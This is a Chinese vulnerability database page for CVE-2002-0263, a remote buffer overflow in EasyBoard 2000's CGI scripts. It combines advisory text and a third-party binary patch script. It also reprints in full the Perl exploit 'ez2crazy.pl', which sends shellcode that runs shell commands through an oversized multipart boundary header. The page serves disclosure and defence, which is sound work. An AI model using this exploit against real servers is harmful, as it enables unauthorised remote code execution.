CVE-2002-0263
CVSS7.5
发布时间 :2002-05-29 00:00:00
修订时间 :2016-10-17 22:17:53
NMCOES    

[原文]Buffer overflow in EasyBoard 2000 1.27 (aka EZboard) allows remote attackers to execute arbitrary code via a long boundary value in a multipart Content-Type header to (1) ezboard.cgi, (2) ezman.cgi, or (3) ezadmin.cgi.


[CNNVD]EZNE.NET Ezboard 2000远程缓冲溢出漏洞(CNNVD-200205-100)

        
        Ezboard 2000是一个基于web的BBS。它可以运行在Linux系统上。
        Ezboard 1.27中所带的某些CGI程序存在可被远程利用的缓冲区溢出漏洞。
        在一些CGI程序里,用户提供的数据用sprintf写到静态数组里。超大的用户数据可以溢出数组,并且覆盖内存中邻近堆的地址。如果返回指针被覆盖,那么受影响进程可以执行任意的代码。
        其中脚本ezboard.cgi, ezman.cgi, ezadmin.cgi存在这个漏洞。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0263
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0263
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-100
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101345069220199&w=2
(UNKNOWN)  BUGTRAQ  20020211 EasyBoard 2000 Remote Buffer Overflow Vulnerability
http://www.iss.net/security_center/static/8162.php
(VENDOR_ADVISORY)  XF  ezboard-bbs-contenttype-bo(8162)
http://www.securityfocus.com/bid/4068
(VENDOR_ADVISORY)  BID  4068

- 漏洞信息

EZNE.NET Ezboard 2000远程缓冲溢出漏洞
高危 边界条件错误
2002-05-29 00:00:00 2005-10-20 00:00:00
远程  
        
        Ezboard 2000是一个基于web的BBS。它可以运行在Linux系统上。
        Ezboard 1.27中所带的某些CGI程序存在可被远程利用的缓冲区溢出漏洞。
        在一些CGI程序里,用户提供的数据用sprintf写到静态数组里。超大的用户数据可以溢出数组,并且覆盖内存中邻近堆的地址。如果返回指针被覆盖,那么受影响进程可以执行任意的代码。
        其中脚本ezboard.cgi, ezman.cgi, ezadmin.cgi存在这个漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * Jin Ho You (jhyou@chonnam.chonnam.ac.kr)提供了如下补丁程序来修复Linux x86下EasyBoard 2000的二进制程序:
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cut here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        #!/usr/bin/perl
        # ezboard-fix.pl
        #
        # EasyBoard 2000 Buffer Overflow Vulnerability Fix for x86 Linux version
        #
        # Run this program in the directory where ezboard.cgi exists.
        #
        # Programmed by Jin Ho You, jhyou@chonnam.chonnam.ac.kr, 2002/02/11
        LOOP:
        for $cgi_file ("ezboard.cgi","ezadmin.cgi", "ezman.cgi") {
         if (! -e $cgi_file) {
         print "$cgi_file does not exist.\n";
         next LOOP;
         }
         $cgi_content=`cat $cgi_file`;
         if (index($cgi_content, "EasyBoard 2000") == -1 ||
         index($cgi_content, "ld-linux.so") == -1) {
         print "$cgi_file is not EasyBoard 2000 for x86 Linux.\n";
         next LOOP;
         }
         @obj_header = split(' ', `objdump -h $cgi_file | grep rodata`);
         $moff_section = hex($obj_header[3]);
         $foff_section = hex($obj_header[5]);
         $foff_fmtstr = index($cgi_content, "--");
         $moff_fmtstr = $moff_section + $foff_fmtstr - $foff_section;
         $foff_push = index($cgi_content, pack("V",$moff_fmtstr));
         if ($foff_push == -1) {
         print "$cgi_file is already fixed!\n";
         next LOOP;
         }
         printf "$cgi_file: '--%' = 0x%08x, push '--%' = 0x%08x\n",
         $foff_fmtstr, $foff_push;
         open(CGI, "+<$cgi_file") or die "cannot open $cgi_file: $!";
         seek(CGI, $foff_fmtstr + 17, SEEK_SET);
         print CGI "--%.200s";
         seek(CGI, $foff_push, SEEK_SET);
         print CGI pack("V", $moff_fmtstr + 17);
         close(CGI);
        }
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cut here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        厂商补丁:
        EZNE.net
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://ezne.net/

- 漏洞信息 (21287)

EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability (EDBID:21287)
cgi remote
2002-02-11 Verified
0 Jin Ho You
N/A [点击下载]
source: http://www.securityfocus.com/bid/4068/info

Ezboard 2000 is a web based bulletin board system. It is available for Linux systems.

A vulnerability has been reported in some versions of Ezboard. In some CGI programs, user supplied data is written to a staticly sized array with a sprintf call. Large amounts of user supplied data may overflow this array and overwrite adjacent areas of stack memory. If return pointers are overwritten, arbitrary code may be executed as the vulnerable process.

It has been reported that the scripts ezboard.cgi, ezman.cgi and ezadmin.cgi suffer from this vulnerability. 

#!/usr/bin/perl
# ez2crazy.pl
#
# Remote Buffer Overflow x86 Linux Exploit for
#    CrazyWWWBoard(http://www.crazywwwboard.com),
#    EasyBoard 2000(http://ezboard.new21.org) and
#    CGIs using qDecoder 4.0~5.0.8
#
# Excessive boundary delimiter string in the header
# "Content-Type: multipart/form-data" permits the buffer overflow attack.
#
# Programmed by Jin Ho You, jhyou@chonnam.chonnam.ac.kr, 2002/02/11

$usage =
"usage: ez2crazy.pl [options] CGI-URL\n
  CGI-URL        URL of the target CGI
  -c command     Bourne shell command
                 Default: '/bin/echo 00ps, Crazy!;id'
  -o offset      Offset of the egg shell code,
                 Recommended [-300,+300]

example)
  ez2crazy.pl http://target.com:8080/cgi-bin/vulnerable.cgi
  ez2crazy.pl -o -47 target.com/cgi-bin/vulnerable.cgi
  ez2crazy.pl -c 'echo vulnerable.cgi has a security hole! | mail root' \\
           target.com/cgi-bin/vulnerable.cgi

";

use Getopt::Std;
getopt('oc');

if ($#ARGV < 0) {
    print $usage;
    exit(0);
};

$cgiurl = $ARGV[0];
$command = $opt_c ? $opt_c : "/bin/echo 00ps, Crazy!;id";
$offset = $opt_o ? $opt_o : 0;


$cgiurl =~ s/http:\/\///;
($host, $cgiuri) = split(/\//, $cgiurl, 2);
($host, $port) = split(/:/, $host);
$port = 80 unless $port;

$command = "/bin/echo Content-Type: text/html;/bin/echo;($command)";
$cmdlen = length($command);

$argvp = int((0x0b + $cmdlen) / 4) * 4 + 4;
$shellcode =
  "\xeb\x37"                            # jmp 0x37
. "\x5e"                                # popl %esi
. "\x89\x76" . pack(C, $argvp)          # movl %esi,0xb(%esi)
. "\x89\xf0"                            # movl %esi,%eax
. "\x83\xc0\x08"                        # addl $0x8,%eax
. "\x89\x46" . pack(C, $argvp + 4)      # movl %eax,0xb(%esi)
. "\x89\xf0"                            # movl %esi,%eax
. "\x83\xc0\x0b"                        # addl $0xb,%eax
. "\x89\x46" . pack(C, $argvp + 8)      # movl %eax,0xb(%esi)
. "\x31\xc0"                            # xorl %eax,%eax
. "\x88\x46\x07"                        # movb %eax,0x7(%esi)
. "\x4e"                                # dec %esi
. "\x88\x46\x0b"                        # movb %eax,0xb(%esi)
. "\x46"                                # inc %esi
. "\x88\x46" . pack(C, 0x0b + $cmdlen)  # movb %eax,0xb(%esi)
. "\x89\x46" . pack(C, $argvp + 12)     # movl %eax,0xb(%esi)
. "\xb0\x0b"                            # movb $0xb,%al
. "\x89\xf3"                            # movl %esi,%ebx
. "\x8d\x4e" . pack(C, $argvp)          # leal 0xb(%esi),%ecx
. "\x8d\x56" . pack(C, $argvp + 12)     # leal 0xb(%esi),%edx
. "\xcd\x80"                            # int 0x80
. "\x31\xdb"                            # xorl %ebx,%ebx
. "\x89\xd8"                            # movl %ebx,%eax
. "\x40"                                # inc %eax
. "\xcd\x80"                            # int 0x80
. "\xe8\xc4\xff\xff\xff"                # call -0x3c
. "/bin/sh0-c0"                         # .string "/bin/sh0-c0"
. $command;

$offset -= length($command) / 2 + length($host . $port . $cgiurl);
$shelladdr = 0xbffffbd0 + $offset;
$noplen = 242 - length($shellcode);
$jump = $shelladdr + $noplen / 2;
$entries = $shelladdr + 250;
$egg = "\x90" x $noplen . $shellcode . pack(V, $jump) x 9
        . pack(V, $entries) x 2 . pack(V, $jump) x 2;

$content = substr($egg, 254) .
  "--\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n0\r\n--$egg--\r\n";
$contentlength = length($content);

$exploit =
"POST /$cgiuri HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.72 [ko] (X11; I; Linux 2.2.14 i686)
Host: $host:$port
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: ko
Accept-Charset: euc-kr,*,utf-8
Content-type: multipart/form-data; boundary=$egg
Content-length: $contentlength

$content
";

use Socket;
$iaddr = inet_aton($host) or die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) or die("Error: $!\n");
$proto = getprotobyname('tcp') or die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die("Error: $!\n");
connect(SOCKET, $paddr) or die("Error: $!\n");
send(SOCKET, $exploit, 0) or die("Error: $!\n");
while (<SOCKET>) {
    print;
}
close(SOCKET);
		

- 漏洞信息

6809
EasyBoard 2000 ezman.cgi Content-Type Header Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public

- 漏洞描述

A remote overflow exists in EasyBoard 2000. The sprintf() function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted URL request to the ezman.cgi script, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2002-02-10 Unknow
2002-02-10 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Jin Ho You has released an unofficial patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability
Boundary Condition Error 4068
Yes No
2002-02-11 12:00:00 2009-07-11 10:56:00
Discovered by Jin Ho You <jhyou@chonnam.chonnam.ac.kr>

- 受影响的程序版本

EZNE.net ezboard 1.27

- 漏洞讨论

Ezboard 2000 is a web based bulletin board system. It is available for Linux systems.

A vulnerability has been reported in some versions of Ezboard. In some CGI programs, user supplied data is written to a staticly sized array with a sprintf call. Large amounts of user supplied data may overflow this array and overwrite adjacent areas of stack memory. If return pointers are overwritten, arbitrary code may be executed as the vulnerable process.

It has been reported that the scripts ezboard.cgi, ezman.cgi and ezadmin.cgi suffer from this vulnerability.

- 漏洞利用

An exploit has been provided by Jin Ho You &lt;jhyou@chonnam.chonnam.ac.kr&gt;:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

A third party patch has been provided by Jin Ho You <jhyou@chonnam.chonnam.ac.kr>:


EZNE.net ezboard 1.27

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站